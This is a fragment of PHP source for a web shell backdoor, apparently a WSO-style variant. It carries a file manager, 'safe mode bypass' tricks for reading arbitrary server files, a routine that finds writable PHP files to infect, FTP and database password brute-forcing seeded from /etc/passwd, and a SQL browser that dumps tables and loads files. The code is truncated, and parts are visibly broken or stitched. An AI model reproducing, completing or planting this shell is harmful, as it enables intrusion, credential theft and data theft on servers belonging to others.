if (!empty ($_COOKIE['f']))

$_COOKIE['f'] = @unserialize($_COOKIE['f']);

if(!empty($_POST['p1'])) {

switch($_POST['p1']) {//--------------Real SMo--------------//

case 'uploadFile':

if ( is_array($_FILES['f']['tmp_name']) ) {

foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {

if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {

echo "Can't upload file!";

}

break;

case 'mkdir':

if(!@mkdir($_POST['p2']))

echo "Can't create new dir";

break;

case 'delete':

function deleteDir($path) {

$path = (substr($path,-1)=='/') ? $path:$path.'/';

$dh = opendir($path);

while ( ($dokl = readdir($dh) ) !== false) {

$dokl = $path.$dokl;

if ( (basename($dokl) == "..") || (basename($dokl) == ".") )

continue;

$type = filetype($dokl);

if ($type == "dir")

deleteDir($dokl);

else

@unlink($dokl);

}//--------------Real SMo--------------//

closedir($dh);

@rmdir($path);

}

if(is_array(@$_POST['f']))

foreach($_POST['f'] as $f) {

if($f == '..')

continue;

$f = urldecode($f);

if(is_dir($f))

deleteDir($f);

else

@unlink($f);

}

break;

case 'paste':

if($_COOKIE['act'] == 'copy') {

function copy_paste($c,$s,$d){

if(is_dir($c.$s)){

mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if (($f != ".") and ($f != ".."))

copy_paste($c.$s.'/',$f, $d.$s.'/');

} elseif(is_file($c.$s))

@copy($c.$s, $d.$s);

}

foreach($_COOKIE['f'] as $f)

copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);

} elseif($_COOKIE['act'] == 'move') {

function move_paste($c,$s,$d){

if(is_dir($c.$s)){

mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if (($f != ".") and ($f != ".."))

copy_paste($c.$s.'/',$f, $d.$s.'/');

} elseif(@is_file($c.$s))

@copy($c.$s, $d.$s);

}

foreach($_COOKIE['f'] as $f)

@rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);

} elseif($_COOKIE['act'] == 'zip') {

if(class_exists('ZipArchive')) {

$zip = new ZipArchive();

if ($zip->open($_POST['p2'], 1)) {

chdir($_COOKIE['c']);

foreach($_COOKIE['f'] as $f) {

if($f == '..')

continue;

if(@is_file($_COOKIE['c'].$f))

$zip->addFile($_COOKIE['c'].$f, $f);

elseif(@is_dir($_COOKIE['c'].$f)) {

$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));

foreach ($iterator as $key=>$value) {

$zip->addFile(realpath($key), $key);

}

chdir($GLOBALS['cwd']);

$zip->close();

}

} elseif($_COOKIE['act'] == 'unzip') {

if(class_exists('ZipArchive')) {

$zip = new ZipArchive();

foreach($_COOKIE['f'] as $f) {

if($zip->open($_COOKIE['c'].$f)) {

$zip->extractTo($GLOBALS['cwd']);

$zip->close();

}

} elseif($_COOKIE['act'] == 'tar') {

chdir($_COOKIE['c']);

$_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);

ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));

chdir($GLOBALS['cwd']);

}

unset($_COOKIE['f']);

setcookie('f', '', time() - 3600);

break;

default:

if(!empty($_POST['p1'])) {

prototype('act', $_POST['p1']);

prototype('f', serialize(@$_POST['f']));

prototype('c', @$_POST['c']);

}

break;

}

hardHeader();

echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';

$dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);

if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; }

global $sort;

$sort = array('name', 1);

if(!empty($_POST['p1'])) {

if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))

$sort = array($match[1], (int)$match[2]);

}

echo "<script>

function sa() {

for(i=0;i<d.files.elements.length;i++)

if(d.files.elements[i].type == 'checkbox')

d.files.elements[i].checked = d.files.elements[0].checked;

}

</script>

<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";

$dirs = $files = array();

$n = count($dirContent);

for($i=0;$i<$n;$i++) {

$ow = @posix_getpwuid(@fileowner($dirContent[$i]));

$gr = @posix_getgrgid(@filegroup($dirContent[$i]));

$tmp = array('name' => $dirContent[$i],

'path' => $GLOBALS['cwd'].$dirContent[$i],

'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),

'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),

'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),

'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),

'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])

);

if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))

$files[] = array_merge($tmp, array('type' => 'file'));

elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))

$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));

elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != "."))

$dirs[] = array_merge($tmp, array('type' => 'dir'));

}

$GLOBALS['sort'] = $sort;

function cmp($a, $b) {

if($GLOBALS['sort'][0] != 'size')

return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);

else

return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);

}

usort($files, "cmp");

usort($dirs, "cmp");

$files = array_merge($dirs, $files);

$l = 0;

foreach($files as $f) {

echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']

.'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'frame\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';

$l = $l?0:1;

}

echo "<tr id=fak><td colspan=7>

<label><select name='p1'>";

if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))

echo "<option value='paste'>↳ Paste</option>";

echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";

if(class_exists('ZipArchive'))

echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (unzip)</option>";

echo "<option value='tar'>Compress (tar.gz)</option>";

echo "</select></label>";

if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))

echo " file name: <input type=text name=p2 value='orvx_" . rand(100000,900000) . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> ";

echo "<input type='submit' value='submit'></td></tr></form></table></div>";

hardFooter();

}

function actionStringTools() {

if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}

if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}

if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}

if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}

if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}

$stringTools = array(

'Base64 encode' => 'base64_encode',

'Base64 decode' => 'base64_decode',

'Url encode' => 'urlencode',

'Url decode' => 'urldecode',

'Full urlencode' => 'full_urlencode',

'md5 hash' => 'md5',

'sha1 hash' => 'sha1',

'crypt' => 'crypt',

'CRC32' => 'crc32',

'ASCII to HEX' => 'ascii2hex',

'HEX to ASCII' => 'hex2ascii',

'HEX to DEC' => 'hexdec',

'HEX to BIN' => 'hex2bin',

'DEC to HEX' => 'dechex',

'DEC to BIN' => 'decbin',

'BIN to HEX' => 'binhex',

'BIN to DEC' => 'bindec',

'String to lower case' => 'strtolower',

'String to upper case' => 'strtoupper',

'Htmlspecialchars' => 'htmlspecialchars',

'String length' => 'strlen',

);

if(isset($_POST['ajax'])) {

prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);

ob_start();

if(in_array($_POST['p1'], $stringTools))

echo $_POST['p1']($_POST['p2']);

$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";

echo strlen($temp), "\n", $temp;

exit;

}

if(empty($_POST['ajax'])&&!empty($_POST['p1']))

prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);

hardHeader();

echo '<h1>String conversions</h1><div class=content>';

echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>";

foreach($stringTools as $k => $v)

echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";

echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";

if(!empty($_POST['p1'])) {

if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));

}

echo"</pre></div><br><h1>Search files:</h1><div class=content>

</table></form>";

function hardRecursiveGlob($path) {

if(substr($path, -1) != '/')

$path.='/';

$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));

if(is_array($paths)&&@count($paths)) {

foreach($paths as $dokl) {

if(@is_dir($dokl)){

if($path!=$dokl)

hardRecursiveGlob($dokl);

} else {

if(empty($_POST['p2']) || @strpos(file_get_contents($dokl), $_POST['p2'])!==false)

echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($dokl)."\", \"view\",\"\")'>".htmlspecialchars($dokl)."</a><br>";

}

if(@$_POST['p3'])

hardRecursiveGlob($_POST['c']);

echo "</div><br><h1>Search for hash:</h1><div class=content>

</form></div>";

hardFooter();

}

function actionDeliverytest() {

header("Location: ?email");

exit();

}

function actionSafeMode() {

$temp='';

ob_start();

switch($_POST['p1']) {

case 1:

$temp=@tempnam($test, 'cx');

if(@copy("compress.zlib://".$_POST['p2'], $temp)){

echo @file_get_contents($temp);

unlink($temp);

} else

echo 'Sorry... Can\'t open file';

break;

case 2:

$files = glob($_POST['p2'].'*');

if( is_array($files) )

foreach ($files as $filename)

echo $filename."\n";

break;

case 3:

$ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);

curl_exec($ch);

break;

case 4:

ini_restore("safe_mode");

ini_restore("open_basedir");

include($_POST['p2']);

break;

case 5:

for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {

$uid = @posix_getpwuid($_POST['p2']);

if ($uid)

echo join(':',$uid)."\n";

}

break;

case 6:

if(!function_exists('imap_open'))break;

$stream = imap_open($_POST['p2'], "", "");

if ($stream == FALSE)

break;

echo imap_body($stream, 1);

imap_close($stream);

break;

}

$temp = ob_get_clean();

hardHeader();

echo '<h1>Safe mode bypass</h1><div class=content>';

echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value="submit"></form>';

if($temp)

echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';

echo '</div>';

hardFooter();

}

function actionLogout() {

setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);

die(header('Location: '.$_SERVER['PHP_SELF']));

}

function actionchangepass() {

$s_result='';

if(isset($_POST['p1'])&&!empty($_POST['p1'])){

$newpass = isset($_POST['p2'])? trim($_POST['p2']):"";

if(changepass($newpass)){

$s_result = '<b style="color:#28C76F !important">Password Changed!</b>';

}

else {$s_result = '<b style="color:#EA5455 !important">password can\'t changed!</b>';}

}

hardHeader();

echo '<h1>Change Password</h1><br>'.$s_result.'<div class=content>';

echo '<span>Your new password (leave empty to make the shell without password): </span><form method=post onsubmit="g(\'changepass\',null,\'submit\',this.passwordnew.value,\'\');return false;"><input class="toolsInp" type=text name=passwordnew><input name=submitnewpass type=submit value="submit"></form>';

echo '</div><br>';

hardFooter();

}

function actionSelfRemove() {

if($_POST['p1'] == 'yes')

if(@unlink(preg_replace('!$\d+$\s.*!', '', $_SERVER['SCRIPT_FILENAME'])))

die('Shell has been removed');

else

echo 'unlink error!';

if($_POST['p1'] != 'yes')

hardHeader();

echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';

hardFooter();

}

function actionInfect() {

hardHeader();

echo '<h1>Infect</h1><div class=content>';

if($_POST['p1'] == 'infect') {

$target=$_SERVER['DOCUMENT_ROOT'];

function ListFiles($dir) {

if($dh = opendir($dir)) {

$files = Array();

$inner_files = Array();

while($file = readdir($dh)) {

if($file != "." && $file != "..") {

if(is_dir($dir . "/" . $file)) {

$inner_files = ListFiles($dir . "/" . $file);

if(is_array($inner_files)) $files = array_merge($files, $inner_files);

} else {

array_push($files, $dir . "/" . $file);

}

closedir($dh);

return $files;

}

foreach (ListFiles($target) as $key=>$file){

$nFile = substr($file, -4, 4);

if($nFile == ".php" ){

if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){

echo "$file<br>";

$i++;

}

echo "<font color=#7367F0 size=14>$i</font>";

}else{

echo "<form method=post><input type=submit value=Infect name=infet></form>";

echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';

}

hardFooter();

}

function actionBruteforce() {

hardHeader();

if( isset($_POST['proto']) ) {

echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';

if( $_POST['proto'] == 'ftp' ) {

function bruteForce($ip,$port,$login,$pass) {

$fp = @ftp_connect($ip, $port?$port:21);

if(!$fp) return false;

$res = @ftp_login($fp, $login, $pass);

@ftp_close($fp);

return $res;

}

} elseif( $_POST['proto'] == 'mysql' ) {

function bruteForce($ip,$port,$login,$pass) {

$res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);

@mysql_close($res);

return $res;

}

} elseif( $_POST['proto'] == 'pgsql' ) {

function bruteForce($ip,$port,$login,$pass) {

$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";

$res = @pg_connect($str);

@pg_close($res);

return $res;

}

$success = 0;

$attempts = 0;

$server = explode(":", $_POST['server']);

if($_POST['type'] == 1) {

$temp = @file('/etc/passwd');

if( is_array($temp) )

foreach($temp as $line) {

$line = explode(":", $line);

++$attempts;

if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {

$success++;

echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';

}

if(@$_POST['reverse']) {

$tmp = "";

for($i=strlen($line[0])-1; $i>=0; --$i)

$tmp .= $line[0][$i];

++$attempts;

if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {

$success++;

echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);

}

} elseif($_POST['type'] == 2) {

$temp = @file($_POST['dict']);

if( is_array($temp) )

foreach($temp as $line) {

$line = trim($line);

++$attempts;

if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {

$success++;

echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';

}

echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";

}

echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'

.'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>'

.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'

.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'

.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'

.'<input type=hidden name=ne value="">'

.'<span>Server:port</span></td>'

.'<td><input type=text name=server value="127.0.0.1"></td></tr>'

.'<tr><td><span>Brute type</span></td>'

.'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>'

.'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>'

.'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>'

.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'

.'<td><input type=text name=login value="root"></td></tr>'

.'<tr><td><span>Dictionary</span></td>'

.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'

.'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';

echo '</div>';

hardFooter();

}

function actionSql() {

class DbClass {

var $type;

var $link;

var $res;

function __construct($type) {

$this->type = $type;

}

function connect($host, $user, $pass, $dbname){

switch($this->type) {

case 'mysql':

if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;

break;

case 'pgsql':

$host = explode(':', $host);

if(!$host[1]) $host[1]=5432;

if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;

break;

}

return false;

}

function selectdb($db) {

switch($this->type) {

case 'mysql':

if (@mysql_select_db($db))return true;

break;

}

return false;

}

function query($str) {

switch($this->type) {

case 'mysql':

return $this->res = @mysql_query($str);

break;

case 'pgsql':

return $this->res = @pg_query($this->link,$str);

break;

}

return false;

}

function fetch() {

$res = func_num_args()?func_get_arg(0):$this->res;

switch($this->type) {

case 'mysql':

return @mysql_fetch_assoc($res);

break;

case 'pgsql':

return @pg_fetch_assoc($res);

break;

}

return false;

}

function listDbs() {

switch($this->type) {

case 'mysql':

return $this->query("SHOW databases");

break;

case 'pgsql':

return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");

break;

}

return false;

}

function listTables() {

switch($this->type) {

case 'mysql':

return $this->res = $this->query('SHOW TABLES');

break;

case 'pgsql':

return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");

break;

}

return false;

}

function error() {

switch($this->type) {

case 'mysql':

return @mysql_error();

break;

case 'pgsql':

return @pg_last_error();

break;

}

return false;

}

function setCharset($str) {

switch($this->type) {

case 'mysql':

if(function_exists('mysql_set_charset'))

return @mysql_set_charset($str, $this->link);

else

$this->query('SET CHARSET '.$str);

break;

case 'pgsql':

return @pg_set_client_encoding($this->link, $str);

break;

}

return false;

}

function loadFile($str) {

switch($this->type) {

case 'mysql':

return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));

break;

case 'pgsql':

$this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;");

$r=array();

while($i=$this->fetch())

$r[] = $i['file'];

$this->query('drop table hard2');

return array('file'=>implode("\n",$r));

break;

}

return false;

}

function dump($table, $fp = false) {

switch($this->type) {

case 'mysql':

$res = $this->query('SHOW CREATE TABLE `'.$table.'`');

$create = mysql_fetch_array($res);

$sql = $create[1].";\n";

if($fp) fwrite($fp, $sql); else echo($sql);

$this->query('SELECT * FROM `'.$table.'`');

$i = 0;

$head = true;

while($dokl = $this->fetch()) {

$sql = '';

if($i % 1000 == 0) {

$head = true;

$sql = ";\n\n";

}

$columns = array();

foreach($dokl as $k=>$v) {

if($v === null)

$dokl[$k] = "NULL";

elseif(is_int($v))

$dokl[$k] = $v;

else

$dokl[$k] = "'".@mysql_real_escape_string($v)."'";

$columns[] = "`".$k."`";

}

if($head) {

$sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $dokl).')';

$head = false;

} else

$sql .= "\n\t,(".implode(", ", $dokl).')';

if($fp) fwrite($fp, $sql); else echo($sql);

$i++;

}

if(!$head)

if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");

break;

case 'pgsql':

$this->query('SELECT * FROM '.$table);

while($dokl = $this->fetch()) {

$columns = array();

foreach($dokl as $k=>$v) {

$dokl[$k] = "'".addslashes($v)."'";

$columns[] = $k;

}

$sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $dokl).');'."\n";

if($fp) fwrite($fp, $sql); else echo($sql);

}

break;

}

return false;

}

};

$db = new DbClass($_POST['type']);

if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {

$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);

$db->selectdb($_POST['sql_base']);

switch($_POST['charset']) {

case "Windows-1251": $db->setCharset('cp1251'); break;

case "UTF-8": $db->setCharset('utf8'); break;

case "KOI8-R": $db->setCharset('koi8r'); break;

case "KOI8-U": $db->setCharset('koi8u'); break;

case "cp866": $db->setCharset('cp866'); break;

}

if(empty($_POST['file'])) {

ob_start("ob_gzhandler", 4096);

header("Content-Disposition: attachment; filename=dump.sql");

header("Content-Type: text/plain");

foreach($_POST['tbl'] as $v)

$db->dump($v);

exit;

} elseif($fp = @fopen($_POST['file'], 'w')) {

foreach($_POST['tbl'] as $v)

$db->dump($v, $fp);

fclose($fp);

unset($_POST['p2']);

} else

die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');

}

hardHeader();

echo "

<h1>Sql browser</h1><div class=content>

<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>

<td><label><select name='type'><option value='mysql' ";

if(@$_POST['type']=='mysql')echo 'selected';

echo ">MySql</option><option value='pgsql' ";

if(@$_POST['type']=='pgsql')echo 'selected';

echo ">PostgreSql</option></select></label></td>

<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\" required></td><td>";

$tmp = "<input type=text name=sql_base value=''>";

if(isset($_POST['sql_host'])){

if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {

switch($_POST['charset']) {

case "Windows-1251": $db->setCharset('cp1251'); break;

case "UTF-8": $db->setCharset('utf8'); break;

case "KOI8-R": $db->setCharset('koi8r'); break;

case "KOI8-U": $db->setCharset('koi8u'); break;

case "cp866": $db->setCharset('cp866'); break;

}

$db->listDbs();

echo "<label><select name=sql_base><option value=''></option>";

while($dokl = $db->fetch()) {

list($key, $value) = each($dokl);

echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';

}

echo '</select></label>';

}

else echo $tmp;

}else

echo $tmp;

echo "</td>

<td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>

</tr>

</table>

s_db='".@addslashes($_POST['sql_base'])."';

function fs(f) {

if(f.sql_base.value!=s_db) { f.onsubmit = function() {};

if(f.p1) f.p1.value='';

if(f.p2) f.p2.value='';

if(f.p3) f.p3.value='';

}

function st(t,l) {

d.sf.p1.value = 'select';

d.sf.p2.value = t;

if(l && d.sf.p3) d.sf.p3.value = l;

d.sf.submit();

}

function is() {

for(i=0;i<d.sf.elements['tbl[]'].length;++i)

d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;

}

</script>";

if(isset($db) && $db->link){

echo "<br/><table width=100% cellpadding=2 cellspacing=0>";

if(!empty($_POST['sql_base'])){

$db->selectdb($_POST['sql_base']);

echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";

$tbls_res = $db->listTables();

while($dokl = $db->fetch($tbls_res)) {

list($key, $value) = each($dokl);

if(!empty($_POST['sql_count']))

$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));

$value = htmlspecialchars($value);

echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>";

}

echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";

if(@$_POST['p1'] == 'select') {

$_POST['p1'] = 'query';

$_POST['p3'] = $_POST['p3']?$_POST['p3']:1;

$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);

$num = $db->fetch();

$pages = ceil($num['n'] / 30);

echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";

echo " of $pages";

if($_POST['p3'] > 1)

echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";

if($_POST['p3'] < $pages)

echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";

$_POST['p3']--;

if($_POST['type']=='pgsql')

$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);

else

$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';

echo "<br><br>";

}

if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {

$db->query(@$_POST['p2']);

if($db->res !== false) {

$title = false;

echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';

$line = 1;

while($dokl = $db->fetch()) {

if(!$title) {

echo '<tr>';

foreach($dokl as $key => $value)

echo '<th>'.$key.'</th>';

reset($dokl);

$title=true;

echo '</tr><tr>';

$line = 2;

}

echo '<tr class="l'.$line.'">';

$line = $line==1?2:1;

foreach($dokl as $key => $value) {

if($value == null)

echo '<td><i>null</i></td>';

else

echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';

}

echo '</tr>';

}

echo '</table>';

} else {

echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';

}

echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";

if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))

echo htmlspecialchars($_POST['p2']);

echo "</textarea><br/><input type=submit value='Execute'>";

echo "</td></tr>";

}

echo "</table></form><br/>";

if($_POST['type']=='mysql') {

$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");

if($db->fetch())

echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='submit'></form>";

}

if(@$_POST['p1'] == 'loadfile') {

$file = $db->loadFile($_POST['p2']);

